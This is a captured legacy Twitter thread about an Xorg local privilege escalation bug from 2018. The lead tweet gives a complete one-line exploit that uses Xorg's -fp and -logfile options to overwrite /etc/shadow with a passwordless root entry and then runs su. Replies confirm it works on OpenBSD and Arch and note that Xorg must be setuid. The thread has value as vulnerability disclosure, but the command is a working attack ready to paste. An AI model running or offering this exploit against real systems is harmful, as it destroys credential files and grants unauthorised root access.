Twitter | Search | |
This is the legacy version of twitter.com. We will be shutting it down on 15 December 2020. Please switch to a supported browser or device. You can see a list of supported browsers in our Help Center.
Hacker Fantastic
-2018-14665 - a LPE exploit via fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
Reply Retweet Like More
Hacker Fantastic 25 Oct 18
Replying to @info_dox
werd, you used the same technique in an earlier exploit against gnu-screen - I use that bug in my training, you are using the default shell (presumed bash) which drops privileges on most systems using your technique after the shell execve's. It's less reliable that way.
Reply Retweet Like
Will Dormann 25 Oct 18
XOrg on OpenBSD (I tested 6.3) definitely clobbers root-owned files with this technique. :-/
Reply Retweet Like
Hacker Fantastic 26 Oct 18
Replying to @pwned4ever @nushinde
Bug found by - my contribution was noticing it's 0day status in OpenBSD and making PoC.
Reply Retweet Like
Hacker Fantastic 26 Oct 18
the old file is backed up to /etc/shadow.old
Reply Retweet Like
Louis Dion-Marcil 25 Oct 18
Replying to @hackerfantastic
To be fair, Xorg needs to be setuid for this to work, which it hasn't been for a while on most end-user distros. Servers distros, like redhat/centos, is a different story.
Reply Retweet Like
A̙̪̰̮̠̻l̷̼̘͚̣̭̻é̻͓x̬͓̹e̗̩y̛͈͖̝̹̪͉a̦̲͉̟̮͕̻͡n̷̺̱ 25 Oct 18
I was able to reproduce this on a current Arch system. But had to do it from a tty.
Reply Retweet Like